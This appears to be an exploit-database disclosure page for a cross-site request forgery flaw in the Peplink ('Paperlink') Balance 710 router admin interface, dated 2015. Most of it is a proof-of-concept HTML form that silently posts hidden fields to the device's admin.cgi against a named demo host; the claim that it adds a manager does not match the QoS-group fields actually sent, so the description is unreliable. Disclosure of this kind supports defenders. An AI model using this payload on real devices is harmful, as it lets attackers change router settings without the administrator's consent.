Paperlink Balance 710 Cross Site Request Forgery

2015.06.10
Credit: provensec
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

??# Affected software: paperlink balance 710 # Type of vulnerability:csrf # URL:peplink.com <http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi> # Discovered by: provensec # Website: provensec.com #version:710 # Proof of concept? a new manager can be added using csrf attack <html> <body> <form action="http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi" method="POST"> <input type="hidden" name="section" value="EQOS&#95;group&#95;modify" /> <input type="hidden" name="rule&#95;id" value="" /> <input type="hidden" name="iptype" value="0" /> <input type="hidden" name="ipaddr" value="123&#46;123&#46;1&#46;23" /> <input type="hidden" name="netmask" value="24" /> <input type="hidden" name="group" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html>?

References:

http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top